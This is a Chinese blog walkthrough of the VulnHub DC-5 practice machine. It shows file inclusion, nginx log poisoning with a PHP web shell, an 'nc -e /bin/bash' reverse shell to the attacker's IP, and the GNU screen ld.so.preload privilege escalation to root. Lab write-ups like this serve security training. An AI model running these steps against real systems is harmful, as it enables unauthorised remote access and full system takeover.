Vulnhub靶场实战———DC5

最新推荐文章于 2024-04-03 16:08:43 发布
最新推荐文章于 2024-04-03 16:08:43 发布
阅读量125 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67309561/article/details/130527459
版权

环境下载

DC and Five86 Series Challenges - DC-5

环境配置 

信息探测

PS:此关和前面DC4一样,都是只有一个FLAG并且是通过提权的方式来获取FLAG

发现80端口开启,我们进入看一下

获取flag 

发现是一个简单页面,但是到如下页面

我们每次提交时,下面数字都会发现改变,我们猜测并不是一个静态数据,存在文件包含,我们测试一下

http://192.168.100.14/thankyou.php?file=/etc/passwd

果然存在数据,但是这个站点不存在文件上传功能,所以尝试包含日志文件写shell

http://192.168.100.14/thankyou.php?file=/var/log/nginx/access.log

 访问 <?php system($_GET['cmd']) ;>,写入日志记录文件

查看错误日志,看看是否成功 

并未发现报语法错误,

接下来我们使用kali监听4444端口,并反弹shell 

<?php system($_GET['cmd']);?>
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.100.3 4444

成功监听并反弹成功

 接下来我们使用Python得到一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

 查看该用户有什么root权限命令,我们发现了一个screen的东西

find / -perm -u=s -type f 2>/dev/null

那接下来我们就在kali使用searchsploit 搜索 screen

我们发现了两个exp, 我们在kali本地编译得到 libhax.so 和 rootshell

gcc -fPIC -shared -ldl -o libhax.so  libhax.c

gcc -o rootshell rootshell.c

  

已经存在了两个文件,接下来我们将其上传至靶机 tmp目录

scp root@10.10.10.10:/home/xx /home/xx

上传完成,接下来就到了最后的提取操作了

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
screen -ls
cd /tmp
./rootshell

获取FLAG,结束! 

Digh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 147
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
vulnhub DC-5靶机实战
m0_51195235的博客
10-09 103
vulnhub DC-5靶机实战
DC-5靶机,致网络安全开发
2301_79058150的博客
04-03 813
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5428
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试
读书 买花 长大
03-14 1191
DC-5
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1191
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
DC-5靶机
m0_62094846的博客
07-01 361
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.133 -p- -oN nmap133.A(中途IP改成了192.168.61.134)开放了80,111,39542打开显示的IP地址 在concat界面把信息填写,就会跳转页面,是GET传参 反复刷新会发现时间有变化,猜测页面存在文件包含(?)然后用burp爆破页面(御剑扫不出来)一共7个 footer可以看到这个,确认这
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 482
DC-5靶机详细渗透过程
DC-5靶机渗透详细步骤
wwxxss
10-18 617
DC5渗透测试
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2108
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC靶机系列:DC-5
Ays.Ie的博客
02-27 352
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
vulnhub靶场,DC-5
kukudeshuo的博客
07-13 491
vulnhub靶场,DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
DC-5靶机渗透实战
weixin_74545038的博客
10-15 53
主机探测#端口扫描​80.111#目录爆破#Web界面啥苟八拉丁语没啥用组件:php+nginx1.6.2读取nginx配置文件信息,发现nginx日志记录文件路径 Nginx配置文件路径: /etc/nginx/nginx.confNginx日志文件所在目录:/var/log/nginx/access.log /var/log/nginx/error.log存在文件包含漏洞​。
vulnhub靶场 breakout
08-29
- *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值